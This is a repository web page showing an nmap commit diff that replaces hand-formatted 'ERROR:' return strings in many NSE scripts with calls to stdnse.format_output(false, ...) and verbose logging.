PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-06 04:31:29 +00:00
Code Issues Projects Releases Wiki Activity

Remove many ERROR outputs from non-debug NSE output

Browse Source
This commit is contained in:
dmiller
2015-08-27 20:43:55 +00:00
parent fb5c947453
commit 7852fa3c18
137 changed files with 334 additions and 380 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
scripts/ajp-auth.nse
View File

@@ -30,13 +30,11 @@ portrule = shortport.port_or_service(8009, 'ajp13', 'tcp')
local arg_path = stdnse.get_script_args(SCRIPT_NAME .. ".path")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function(host, port)
local helper = ajp.Helper:new(host, port)
if ( not(helper:connect()) ) then
return fail("Failed to connect to AJP server")
return stdnse.format_output(false, "Failed to connect to AJP server")
end
local status, answer = helper:get(arg_path or "/")

2
scripts/ajp-brute.nse
View File

@@ -35,7 +35,7 @@ portrule = shortport.port_or_service(8009, 'ajp13', 'tcp')
local arg_url = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/"
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
Driver = {

4
scripts/ajp-headers.nse
View File

@@ -31,8 +31,6 @@ categories = {"discovery", "safe"}
local arg_path = stdnse.get_script_args(SCRIPT_NAME .. '.path') or "/"
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function(host, port)
local method
local helper = ajp.Helper:new(host, port)
@@ -42,7 +40,7 @@ action = function(host, port)
helper:close()
if ( not(status) ) then
return fail("Failed to retrieve server headers")
return stdnse.format_output(false, "Failed to retrieve server headers")
end
return stdnse.format_output(true, response.rawheaders)
end

4
scripts/ajp-methods.nse
View File

@@ -51,13 +51,11 @@ local function filter_out(t, filter)
return result
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function(host, port)
local helper = ajp.Helper:new(host, port)
if ( not(helper:connect()) ) then
return fail("Failed to connect to server")
return stdnse.format_output(false, "Failed to connect to server")
end
local status, response = helper:options(arg_url)

2
scripts/ajp-request.nse
View File

@@ -52,7 +52,7 @@ local arg_file = stdnse.get_script_args(SCRIPT_NAME .. ".filename")
local arg_username = stdnse.get_script_args(SCRIPT_NAME .. ".username")
local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)

8
scripts/bitcoin-getaddr.nse
View File

@@ -38,23 +38,25 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service(8333, "bitcoin", "tcp" )
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)
local bcoin = bitcoin.Helper:new(host, port, { timeout = 20000 })
local status = bcoin:connect()
if ( not(status) ) then
return "\n ERROR: Failed to connect to server"
return fail("Failed to connect to server")
end
local status, ver = bcoin:exchVersion()
if ( not(status) ) then
return "\n ERROR: Failed to extract version information"
return fail("Failed to extract version information")
end
local status, nodes = bcoin:getNodes()
if ( not(status) ) then
return "\n ERROR: Failed to extract address information"
return fail("Failed to extract address information")
end
bcoin:close()

6
scripts/bitcoin-info.nse
View File

@@ -35,6 +35,8 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service(8333, "bitcoin", "tcp" )
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)
local NETWORK = {
@@ -46,12 +48,12 @@ action = function(host, port)
local status = bcoin:connect()
if ( not(status) ) then
return "\n ERROR: Failed to connect to server"
return fail("Failed to connect to server")
end
local status, ver = bcoin:exchVersion()
if ( not(status) ) then
return "\n ERROR: Failed to extract version information"
return fail("Failed to extract version information")
end
bcoin:close()

2
scripts/bjnp-discover.nse
View File

@@ -37,7 +37,7 @@ portrule = shortport.portnumber({8611, 8612}, "udp")
action = function(host, port)
local helper = bjnp.Helper:new(host, port)
if ( not(helper:connect()) ) then
return "\n ERROR: Failed to connect to server"
return stdnse.format_output(false, "Failed to connect to server")
end
local status, attrs
if ( port.number == 8611 ) then

8
scripts/broadcast-ataoe-discover.nse
View File

@@ -117,24 +117,22 @@ local function sendConfigInfoRequest(iface)
dnet:ethernet_close()
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function()
local iname = nmap.get_interface()
if ( not(iname) ) then
stdnse.debug1("No interface supplied, use -e")
stdnse.verbose1("No interface supplied, use -e")
return
end
if ( not(nmap.is_privileged()) ) then
stdnse.debug1("not running for lack of privileges")
stdnse.verbose1("not running for lack of privileges")
return
end
local iface = nmap.get_interface_info(iname)
if ( not(iface) ) then
return fail("Failed to retrieve interface information")
return stdnse.format_output(false, "Failed to retrieve interface information")
end
local pcap = nmap.new_socket()

6
scripts/broadcast-dhcp-discover.nse
View File

@@ -149,6 +149,8 @@ local commasep = {
end
}
local function fail (err) return stdnse.format_output(false, err) end
action = function()
local host, port = "255.255.255.255", 67
@@ -173,7 +175,7 @@ action = function()
interfaces = getInterfaces("ethernet", "up")
end
if( not(interfaces) ) then return "\n ERROR: Failed to retrieve interfaces (try setting one explicitly using -e)" end
if( not(interfaces) ) then return fail("Failed to retrieve interfaces (try setting one explicitly using -e)") end
local transaction_id = bin.pack("<I", math.random(0, 0x7FFFFFFF))
local request_type = dhcp.request_types["DHCPDISCOVER"]
@@ -182,7 +184,7 @@ action = function()
-- we need to set the flags to broadcast
local request_options, overrides, lease_time = nil, { flags = 0x8000 }, nil
local status, packet = dhcp.dhcp_build(request_type, ip_address, mac, nil, request_options, overrides, lease_time, transaction_id)
if (not(status)) then return "\n ERROR: Failed to build packet" end
if (not(status)) then return fail("Failed to build packet") end
local threads = {}
local result = {}

8
scripts/broadcast-eigrp-discovery.nse
View File

@@ -192,6 +192,8 @@ local asListener = function(interface, timeout, astab)
condvar("signal")
end
local function fail (err) return stdnse.format_output(false, err) end
action = function()
-- Get script arguments
local as = stdnse.get_script_args(SCRIPT_NAME .. ".as")
@@ -205,7 +207,7 @@ action = function()
-- K params should be of length 6
-- Cisco routers ignore eigrp packets that don't have matching K parameters
if #kparams < 6 or #kparams > 6 then
return "\n ERROR: kparams should be of size 6."
return fail("kparams should be of size 6.")
else
k = {}
k[1] = string.sub(kparams, 1,1)
@@ -221,7 +223,7 @@ action = function()
-- If an interface was provided, get its information
interface = nmap.get_interface_info(interface)
if not interface then
return ("\n ERROR: Failed to retrieve %s interface information."):format(interface)
return fail(("Failed to retrieve %s interface information."):format(interface))
end
interfaces = {interface}
stdnse.debug1("Will use %s interface.", interface.shortname)
@@ -264,7 +266,7 @@ action = function()
stdnse.debug1("Will use %s A.S value.", astab[1])
as = astab[1]
else
return "\n ERROR: Couldn't get an A.S value."
return fail("Couldn't get an A.S value.")
end
end

2
scripts/broadcast-igmp-discovery.nse
View File

@@ -333,7 +333,7 @@ action = function(host, port)
-- Get the interface information
interface = nmap.get_interface_info(interface)
if not interface then
return ("ERROR: Failed to retrieve %s interface information."):format(interface)
return stdnse.format_output(false, ("Failed to retrieve %s interface information."):format(interface))
end
interfaces = {interface}
stdnse.debug1("Will use %s interface.", interface.shortname)

14
scripts/broadcast-listener.nse
View File

@@ -105,14 +105,14 @@ loadDecoders = function(fname)
local abs_fname = nmap.fetchfile(fname)
if ( not(abs_fname) ) then
return false, ("ERROR: Failed to load decoder definition (%s)"):format(fname)
return false, ("Failed to load decoder definition (%s)"):format(fname)
end
local env = setmetatable({Decoders = {}}, {__index = _G});
local file = loadfile(abs_fname, "t", env)
if(not(file)) then
stdnse.debug1("Couldn't load decoder file: %s", fname)
return false, "ERROR: Couldn't load decoder file: " .. fname
return false, "Couldn't load decoder file: " .. fname
end
file()
@@ -120,7 +120,7 @@ loadDecoders = function(fname)
local d = env.Decoders
if ( d ) then return true, d end
return false, "ERROR: Failed to load decoders"
return false, "Failed to load decoders"
end
---
@@ -223,6 +223,8 @@ getInterfaces = function(link, up)
return result
end
local function fail (err) return stdnse.format_output(false, err) end
action = function()
local DECODERFILE = "nselib/data/packetdecoders.lua"
@@ -234,7 +236,7 @@ action = function()
local iinfo, err = nmap.get_interface_info(iface)
if ( not(iinfo.address) ) then
return "\n ERROR: The IP address of the interface could not be determined ..."
return fail("The IP address of the interface could not be determined")
end
interfaces = { { name = iface, address = iinfo.address } }
@@ -245,12 +247,12 @@ action = function()
-- make sure we have at least one interface to start sniffing
if ( #interfaces == 0 ) then
return "\n ERROR: Could not determine any valid interfaces"
return fail("Could not determine any valid interfaces")
end
-- load the decoders from file
local status, Decoders = loadDecoders(DECODERFILE)
if ( not(status) ) then return "\n " .. Decoders end
if ( not(status) ) then return fail(Decoders) end
-- create a local table to handle instantiated decoders
local decodertab = { udp = {}, ether = {} }

4
scripts/broadcast-networker-discover.nse
View File

@@ -58,8 +58,6 @@ local function Callit( host, port, program, protocol )
return true, results
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function()
local results = {}
@@ -80,7 +78,7 @@ action = function()
-- warn about problematic sends on OS X requiring the interface to be
-- supplied as part of IPv6
if ( not(status) and results == "Portmap.Callit: Failed to send data" ) then
return fail("Failed sending data, try supplying the correct interface using -e")
return stdnse.format_output(false, "Failed sending data, try supplying the correct interface using -e")
end
if ( status ) then

2
scripts/broadcast-pc-anywhere.nse
View File

@@ -39,7 +39,7 @@ action = function()
for i=1,2 do
local status = socket:sendto(host, port, "NQ")
if ( not(status) ) then
return "\n ERROR: Failed to send broadcast request"
return stdnse.format_output(false, "Failed to send broadcast request")
end
end

2
scripts/broadcast-pc-duo.nse
View File

@@ -44,7 +44,7 @@ local function udpProbe(probe, responses)
for i=1,2 do
local status = socket:sendto(probe.host, probe.port, probe.data)
if ( not(status) ) then
return "\n ERROR: Failed to send broadcast request"
return stdnse.format_output(false, "Failed to send broadcast request")
end
end

2
scripts/broadcast-pim-discovery.nse
View File

@@ -159,7 +159,7 @@ action = function()
interface = getInterface(mcast)
end
if not interface then
return ("\n ERROR: Couldn't get interface for %s"):format(mcast)
return stdnse.format_output(false, ("Couldn't get interface for %s"):format(mcast))
end
stdnse.debug1("will send via %s interface.", interface.shortname)

4
scripts/broadcast-pppoe-discover.nse
View File

@@ -43,9 +43,7 @@ prerule = function()
end
local function fail(err)
if ( err ) then
return ("\n ERROR: %s"):format(err)
end
return stdnse.format_output(false, err)
end
local function discoverPPPoE(helper)

2
scripts/broadcast-ripng-discover.nse
View File

@@ -147,7 +147,7 @@ RIPng = {
}
}
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
-- Parses a RIPng response
-- @return ret string containing the routing table

2
scripts/broadcast-sybase-asa-discover.nse
View File

@@ -171,7 +171,7 @@ action = function()
local status, instances = helper:ping()
if ( not(status) ) then
return ("\n ERROR: %s"):format(instances)
return stdnse.format_output(false, instances)
end
-- if we don't have any instances, silently abort

4
scripts/broadcast-tellstick-discover.nse
View File

@@ -27,15 +27,13 @@ categories = {"broadcast", "safe"}
prerule = function() return ( nmap.address_family() == 'inet' ) end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function()
local socket = nmap.new_socket("udp")
local host, port = { ip = "255.255.255.255" }, { number = 30303, protocol = "udp" }
socket:set_timeout(5000)
if ( not(socket:sendto(host, port, "D")) ) then
return fail("Failed to send discovery request to server")
return stdnse.format_output(false, "Failed to send discovery request to server")
end
local output = {}

5
scripts/broadcast-wake-on-lan.nse
View File

@@ -39,6 +39,7 @@ local function createWOLPacket(mac)
return "\xff\xff\xff\xff\xff\xff" .. string.rep(bin.pack("H", mac), 16)
end
local function fail (err) return stdnse.format_output(false, err) end
action = function()
@@ -48,7 +49,7 @@ action = function()
elseif( MAC:match("%x%x%-%x%x%-%x%x%-%x%x%-%x%x%-%x%x") ) then
MAC_hex = MAC:gsub("-", "")
else
return "\n ERROR: Failed to process MAC address"
return fail("Failed to process MAC address")
end
local host = { ip = address or "255.255.255.255" }
@@ -60,7 +61,7 @@ action = function()
local packet = createWOLPacket(MAC_hex)
local status, err = socket:sendto(host, port, packet)
if ( not(status) ) then
return "\n ERROR: Failed to send packet"
return fail("Failed to send packet")
end
end
return stdnse.format_output(true, ("Sent WOL packet to: %s"):format(MAC))

6
scripts/broadcast-wpad-discover.nse
View File

@@ -192,13 +192,15 @@ local function dhcpDiscover()
end
local function fail (err) return stdnse.format_output(false, err) end
action = function()
local status, response, wpad
if ( arg_nodhcp and arg_nodns ) then
return "\n ERROR: Both nodns and nodhcp arguments were supplied"
stdnse.verbose1("Both nodns and nodhcp arguments were supplied")
return fail("Both nodns and nodhcp arguments were supplied")
end
if ( nmap.is_privileged() and not(arg_nodhcp) ) then
@@ -213,7 +215,7 @@ action = function()
status, response = dnsDiscover()
if ( not(status) ) then
local services = "DNS" .. ( nmap.is_privileged() and "/DHCP" or "" )
return ("\n ERROR: Could not find WPAD using %s"):format(services)
return fail(("Could not find WPAD using %s"):format(services))
end
wpad = ("http://%s/wpad.dat"):format( response.name )
end

4
scripts/cups-info.nse
View File

@@ -43,13 +43,11 @@ categories = {"safe", "discovery"}
portrule = shortport.port_or_service(631, "ipp", "tcp", "open")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function(host, port)
local helper = ipp.Helper:new(host, port)
if ( not(helper:connect()) ) then
return fail("Failed to connect to server")
return stdnse.format_output(false, "Failed to connect to server")
end
local status, printers = helper:getPrinters()

4
scripts/cups-queue-info.nse
View File

@@ -34,12 +34,10 @@ categories = {"safe", "discovery"}
portrule = shortport.port_or_service(631, "ipp", "tcp", "open")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function(host, port)
local helper = ipp.Helper:new(host, port)
if ( not(helper:connect()) ) then
return fail("Failed to connect to server")
return stdnse.format_output(false, "Failed to connect to server")
end
local output = helper:getQueueInfo()

2
scripts/cvs-brute-repository.nse
View File

@@ -100,7 +100,7 @@ action = function(host, port)
if ( repofile ) then
f = io.open( repofile, "r" )
if ( not(f) ) then
return ("\n ERROR: Failed to open repository file: %s"):format(repofile)
return stdnse.format_output(false, ("Failed to open repository file: %s"):format(repofile))
end
end

2
scripts/cvs-brute.nse
View File

@@ -91,7 +91,7 @@ action = function(host, port)
local repo = stdnse.get_script_args("cvs-brute.repo") and
{ stdnse.get_script_args("cvs-brute.repo") } or
getDiscoveredRepos(host)
if ( not(repo) ) then return "\n ERROR: No CVS repository specified (see cvs-brute.repo)" end
if ( not(repo) ) then stdnse.verbose1("ERROR: No CVS repository specified (see cvs-brute.repo)") end
local status, result

2
scripts/dict-info.nse
View File

@@ -37,7 +37,7 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service(2628, "dict", "tcp")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)
local socket = nmap.new_socket()

2
scripts/distcc-cve2004-2687.nse
View File

@@ -49,7 +49,7 @@ portrule = shortport.port_or_service(3632, "distcc")
local arg_cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "id"
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)

10
scripts/dns-blacklist.nse
View File

@@ -109,17 +109,19 @@ local function formatResult(result)
return output
end
local function fail (err) return stdnse.format_output(false, err) end
dnsblAction = function(host)
local helper
if ( arg_services and ( not(arg_category) or "all" == arg_category:lower() ) ) then
return "\n ERROR: A service filter can't be used without a specific category"
return fail("A service filter can't be used without a specific category")
elseif( "all" ~= arg_category ) then
helper = dnsbl.Helper:new(arg_category, arg_mode)
helper:setFilter(arg_services)
local status, err = helper:validateFilter()
if ( not(status) ) then
return ("\n ERROR: %s"):format(err)
return fail(("%s"):format(err))
end
end
@@ -153,11 +155,11 @@ end
action = function(...)
if ( arg_mode ~= "short" and arg_mode ~= "long" ) then
return "\n ERROR: Invalid argument supplied, mode should be either 'short' or 'long'"
return fail("Invalid argument supplied, mode should be either 'short' or 'long'")
end
if ( arg_IP and not(ipOps.todword(arg_IP)) ) then
return "\n ERROR: Invalid IP address was supplied"
return fail("Invalid IP address was supplied")
end
-- if the list argument was given, just list the services and abort

4
scripts/dns-client-subnet-scan.nse
View File

@@ -330,12 +330,10 @@ local get_addresses = function(address, mask, domain, nameserver, port)
return resp
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
action = function(host, port)
if ( not(argDomain) ) then
return fail(SCRIPT_NAME .. ".domain was not specified")
return stdnse.format_output(false, SCRIPT_NAME .. ".domain was not specified")
end
local nameserver = (host and host.ip) or argNS

63
scripts/dns-random-srcport.nse
View File

@@ -3,6 +3,7 @@ local comm = require "comm"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
local stdnse = require "stdnse"
description = [[
Checks a DNS server for the predictable-port recursion vulnerability.
@@ -43,6 +44,8 @@ categories = {"external", "intrusive"}
portrule = shortport.portnumber(53, "udp")
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
-- TXID: 0xbeef
@@ -75,11 +78,7 @@ action = function(host, port)
-- Fail gracefully
if not status then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: TIMEOUT"
else
return
end
return fail(result)
end
-- Update the port
@@ -89,40 +88,24 @@ action = function(host, port)
-- We need a minimum of 5 bytes...
if (#result < 5) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Malformed response"
else
return
end
return fail("Malformed response")
end
-- Check TXID
if (string.byte(result, 1) ~= 0xbe
or string.byte(result, 2) ~= 0xef) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Invalid Transaction ID"
else
return
end
return fail("Invalid Transaction ID")
end
-- Check response flag and recursion
if not (bit.band(string.byte(result, 3), 0x80) == 0x80
and bit.band(string.byte(result, 4), 0x80) == 0x80) then
if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
return "ERROR: Server refused recursion"
else
return
end
return fail("Server refused recursion")
end
-- Check error flag
if (bit.band(string.byte(result, 4), 0x0F) ~= 0x00) then
if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
return "ERROR: Server failure"
else
return
end
return fail("Server failure")
end
-- Check for two Answer RRs and 1 Authority RR
@@ -130,20 +113,12 @@ action = function(host, port)
or string.byte(result, 6) ~= 0x01
or string.byte(result, 7) ~= 0x00
or string.byte(result, 8) ~= 0x02) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Response did not include expected answers"
else
return
end
return fail("Response did not include expected answers")
end
-- We need a minimum of 128 bytes...
if (#result < 128) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Truncated response"
else
return
end
return fail("Truncated response")
end
-- Here is the really fragile part. If the DNS response changes
@@ -155,21 +130,13 @@ action = function(host, port)
if (string.byte(result, 118) ~= 0x00
or string.byte(result, 119) ~= 0x10)
then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Answer record not of type TXT"
else
return
end
return fail("Answer record not of type TXT")
end
-- Check for IN
if (string.byte(result, 120) ~= 0x00
or string.byte(result, 121) ~= 0x01) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Answer record not of type IN"
else
return
end
return fail("Answer record not of type IN")
end
-- Get TXT length
@@ -177,11 +144,7 @@ action = function(host, port)
-- We now need a minimum of 128 + txtlen bytes + 1...
if (#result < 128 + txtlen) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Truncated response"
else
return
end
return fail("Truncated response")
end
-- GET TXT record

63
scripts/dns-random-txid.nse
View File

@@ -3,6 +3,7 @@ local comm = require "comm"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
local stdnse = require "stdnse"
description = [[
Checks a DNS server for the predictable-TXID DNS recursion
@@ -43,6 +44,8 @@ categories = {"external", "intrusive"}
portrule = shortport.portnumber(53, "udp")
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
-- TXID: 0xbabe
@@ -75,11 +78,7 @@ action = function(host, port)
-- Fail gracefully
if not status then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: TIMEOUT"
else
return
end
return fail(result)
end
-- Update the port
@@ -89,40 +88,24 @@ action = function(host, port)
-- We need a minimum of 5 bytes...
if (#result < 5) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Malformed response"
else
return
end
return fail("Malformed response")
end
-- Check TXID
if (string.byte(result, 1) ~= 0xba
or string.byte(result, 2) ~= 0xbe) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Invalid Transaction ID"
else
return
end
return fail("Invalid Transaction ID")
end
-- Check response flag and recursion
if not (bit.band(string.byte(result, 3), 0x80) == 0x80
and bit.band(string.byte(result, 4), 0x80) == 0x80) then
if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
return "ERROR: Server refused recursion"
else
return
end
return fail("Server refused recursion")
end
-- Check error flag
if (bit.band(string.byte(result, 4), 0x0F) ~= 0x00) then
if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then
return "ERROR: Server failure"
else
return
end
return fail("Server failure")
end
-- Check for two Answer RRs and 1 Authority RR
@@ -130,20 +113,12 @@ action = function(host, port)
or string.byte(result, 6) ~= 0x01
or string.byte(result, 7) ~= 0x00
or string.byte(result, 8) ~= 0x02) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Response did not include expected answers"
else
return
end
return fail("Response did not include expected answers")
end
-- We need a minimum of 128 bytes...
if (#result < 128) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Truncated response"
else
return
end
return fail("Truncated response")
end
-- Here is the really fragile part. If the DNS response changes
@@ -155,21 +130,13 @@ action = function(host, port)
if (string.byte(result, 118) ~= 0x00
or string.byte(result, 119) ~= 0x10)
then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Answer record not of type TXT"
else
return
end
return fail("Answer record not of type TXT")
end
-- Check for IN
if (string.byte(result, 120) ~= 0x00
or string.byte(result, 121) ~= 0x01) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Answer record not of type IN"
else
return
end
return fail("Answer record not of type IN")
end
-- Get TXT length
@@ -177,11 +144,7 @@ action = function(host, port)
-- We now need a minimum of 128 + txtlen bytes + 1...
if (#result < 128 + txtlen) then
if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then
return "ERROR: Truncated response"
else
return
end
return fail("Truncated response")
end
-- GET TXT record

4
scripts/dns-srv-enum.nse
View File

@@ -81,8 +81,6 @@ local function parseSvcList(services)
end
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function parseSrvResponse(resp)
local i = 1
if ( resp.answers ) then
@@ -153,7 +151,7 @@ action = function(host)
}
if ( not(checkFilter(services)) ) then
return fail(("Invalid filter (%s) was supplied"):format(arg_filter))
return stdnse.format_output(false, ("Invalid filter (%s) was supplied"):format(arg_filter))
end
local threads, result = {}, {}

2
scripts/dns-update.nse
View File

@@ -100,7 +100,7 @@ action = function(host, port)
nmap.set_port_state(host, port, "open")
return stdnse.format_output(true, result)
elseif ( err ) then
return "\n ERROR: " .. err
return stdnse.format_output(false, err)
end
end

10
scripts/domcon-cmd.nse
View File

@@ -96,6 +96,8 @@ local function readAPIBlock( socket )
end
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
local socket = nmap.new_socket()
@@ -104,9 +106,9 @@ action = function(host, port)
local pass = stdnse.get_script_args('domcon-cmd.pass')
local cmd = stdnse.get_script_args('domcon-cmd.cmd')
if( not(cmd) ) then return " \n ERROR: No command supplied (see domcon-cmd.cmd)" end
if( not(user)) then return " \n ERROR: No username supplied (see domcon-cmd.user)" end
if( not(pass)) then return " \n ERROR: No password supplied (see domcon-cmd.pass)" end
if( not(cmd) ) then return fail("No command supplied (see domcon-cmd.cmd)") end
if( not(user)) then return fail("No username supplied (see domcon-cmd.user)") end
if( not(pass)) then return fail("No password supplied (see domcon-cmd.pass)") end
cmds = stdnse.strsplit(";%s*", cmd)
@@ -128,7 +130,7 @@ action = function(host, port)
result_part.name = cmds[i]
table.insert( result, result_part )
else
return " \n ERROR: " .. result_part
return fail(result_part)
end
end

6
scripts/giop-info.nse
View File

@@ -1,5 +1,6 @@
local giop = require "giop"
local shortport = require "shortport"
local stdnse = require "stdnse"
description = [[
Queries a CORBA naming server for a list of objects.
@@ -57,6 +58,7 @@ local fmt_meta = {
end
}
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
local helper = giop.Helper:new( host, port )
@@ -66,10 +68,10 @@ action = function(host, port)
if ( not(status) ) then return err end
status, ctx = helper:GetNamingContext()
if ( not(status) ) then return " \n ERROR: " .. ctx end
if ( not(status) ) then return fail(ctx) end
status, objs = helper:ListObjects(ctx)
if ( not(status) ) then return " \n ERROR: " .. objs end
if ( not(status) ) then return fail(objs) end
for _, obj in ipairs( objs ) do
setmetatable(obj, fmt_meta)

2
scripts/gkrellm-info.nse
View File

@@ -52,7 +52,7 @@ categories = {"discovery", "safe"}
portrule = shortport.port_or_service(19150, "gkrellm", "tcp")
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
local long_names = {
["fs_mounts"] = "Mounts",

2
scripts/gpsd-info.nse
View File

@@ -50,7 +50,7 @@ local function hasAllData(gpsinfo)
return true
end
local function fail(err) return ("\n ERROR: %s"):format(err or "") end
local function fail(err) return stdnse.format_output(false, err) end
action = function(host, port)

2
scripts/http-auth-finder.nse
View File

@@ -78,7 +78,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-backup-finder.nse
View File

@@ -100,7 +100,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if ( not(status) ) then
if ( r.err ) then
return stdnse.format_output(true, "ERROR: %s", r.reason)
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-brute.nse
View File

@@ -127,7 +127,7 @@ action = function( host, port )
local method = string.upper(stdnse.get_script_args("http-brute.method") or "GET")
if ( not(path) ) then
return " \n ERROR: No path was specified (see http-brute.path)"
return stdnse.format_output(false, "No path was specified (see http-brute.path)")
end
local response = http.generic_request( host, port, method, path, { no_cache = true } )

2
scripts/http-cisco-anyconnect.nse
View File

@@ -42,7 +42,7 @@ action = function(host, port)
local ac = anyconnect.Cisco.AnyConnect:new(host, port)
local status, err = ac:connect()
if not status then
return ("\n ERROR: %s"):format(err)
return stdnse.format_output(false, err)
else
local o = stdnse.output_table()
local xmltags = { 'version', 'tunnel-group', 'group-alias',

2
scripts/http-comments-displayer.nse
View File

@@ -108,7 +108,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-csrf.nse
View File

@@ -115,7 +115,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

3
scripts/http-default-accounts.nse
View File

@@ -258,7 +258,8 @@ action = function(host, port)
-- Nuclear launch detected!
results = http.pipeline_go(host, port, requests, nil)
if results == nil then
return "[ERROR] HTTP request table is empty. This should not happen since we at least made one request."
return stdnse.format_output(false,
"HTTP request table is empty. This should not happen since we at least made one request.")
end
-- Record 404 response, later it will be used to determine if page exists

2
scripts/http-devframework.nse
View File

@@ -117,7 +117,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-dombased-xss.nse
View File

@@ -96,7 +96,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

9
scripts/http-domino-enum-passwords.nse
View File

@@ -207,6 +207,7 @@ local function saveIDFile( filename, data )
return true
end
local function fail (err) return stdnse.format_output(false, err) end
action = function(host, port)
@@ -226,7 +227,7 @@ action = function(host, port)
-- A user was provided, attempt to authenticate
if ( user ) then
if (not(isValidCredential( vhost or host, port, path, user, pass )) ) then
return " \n ERROR: The provided credentials where invalid"
return fail("The provided credentials were invalid")
end
else
local c = creds.Credentials:new(creds.ALL_DATA, host, port)
@@ -240,7 +241,7 @@ action = function(host, port)
end
if not pass then
local msg = has_creds and "No valid credentials were found" or "No credentials supplied"
return string.format(" \n ERROR: %s (see domino-enum-passwords.username and domino-enum-passwords.password)", msg)
return fail(("%s (see domino-enum-passwords.username and domino-enum-passwords.password)"):format(msg))
end
end
end
@@ -253,9 +254,9 @@ action = function(host, port)
if ( not(pager) ) then
if ( http_response.body and
http_response.body:match(".*<input type=\"submit\".* value=\"Sign In\">.*" ) ) then
return " \n ERROR: Failed to authenticate"
return fail("Failed to authenticate")
else
return " \n ERROR: Failed to process results"
return fail("Failed to process results")
end
end
pos = 1

2
scripts/http-errors.nse
View File

@@ -91,7 +91,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if (not(status)) then
if (r.err) then
return stdnse.format_output(true, ("ERROR: %s"):format(r.reason))
return stdnse.format_output(false, r.reason)
else
break
end

2
scripts/http-feed.nse
View File

@@ -106,7 +106,7 @@ action = function(host, port)
-- most of them are "legitimate" and should not be reason to abort
if (not(status)) then
if (r.err) then
